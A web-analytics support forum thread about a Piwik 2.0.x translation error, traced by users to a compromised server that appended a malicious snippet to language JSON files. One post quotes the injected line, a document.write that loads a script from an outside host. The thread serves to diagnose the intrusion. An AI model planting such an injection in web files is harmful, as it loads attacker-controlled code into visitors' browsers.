Error in 2.0.3


#1

I updated on the 13th, and all was good until this morning when I received the following error:

Warning: array_replace_recursive(): Argument #2 is not an array in /home2/****/public_html/piwik/core/Translate.php on line 91

Backtrace -->

#0 Piwik\Error::errorHandler(…) called at [:]
#1 array_replace_recursive(…) called at [/home2//public_html/piwik/core/Translate.php:91]
#2 Piwik\Translate::mergeTranslationArray(…) called at [/home2/
/public_html/piwik/core/Translate.php:80]
#3 Piwik\Translate::loadCoreTranslationFile(…) called at [/home2//public_html/piwik/core/Translate.php:36]
#4 Piwik\Translate::loadEnglishTranslation(…) called at [/home2/
/public_html/piwik/core/FrontController.php:325]
#5 Piwik\FrontController->init(…) called at [/home2/****/public_html/piwik/index.php:61]

Any help would be appreciated.


#2

I had the same error, but in Piwik 2.0.1

I found out that it was caused by an incorrect json file in lang folder. At the end of each json file was this code snippet:


/*8989a6*/
document.write("<script src='http://komedes.at/pics/HbfB24mg.php?id=135844199' type='text/javascript'></" + "script>");
/*/8989a6*/

I’ve compared it to the file in github, where this line is not there. It looks to me that Piwik has somewhere has a small security hole.


#3

Thanks. I didn’t see this until now, but I did overwrite all Piwik files with a fresh copy and the error disappeared. Would seem to confirm your theory.

I guess I’ll lock it down until a fix is found.


(Matthieu Aubry) #4

What other softwares do you run on the server? we haven’t got report of any security holes. However it could be that there is one, or that another software on your server (eg. wordpress, phpbb, etc.) would have a hole and it is exploited. Please report with more info and try to find the cause of this bug.

Also update asap to 2.0.3


#5

After closer inspection, I don’t think it’s Piwik. Looks like another application I run was directly targeted, and piwik was caught in the crossfire. Thanks for that message, Matt - I might not have bothered to look any deeper if you hadn’t said anything.


#6

We use a self-written CMS with a shop system.
I have now updated to version 2.0.3, this was not possible before due to the error messages.

However, it thickens that has Piwik a security hole, as in the German and French Forum are also reports of this error. Caused by these lines of javascript and all file changes between the 15th and 16 January.

I will contact you again as soon as I have more information on what happened at this time on our server.


(Matthieu Aubry) #7

@Glomb please send us information as you get it, if there is a problem in Piwik we must fix it asap! thank you!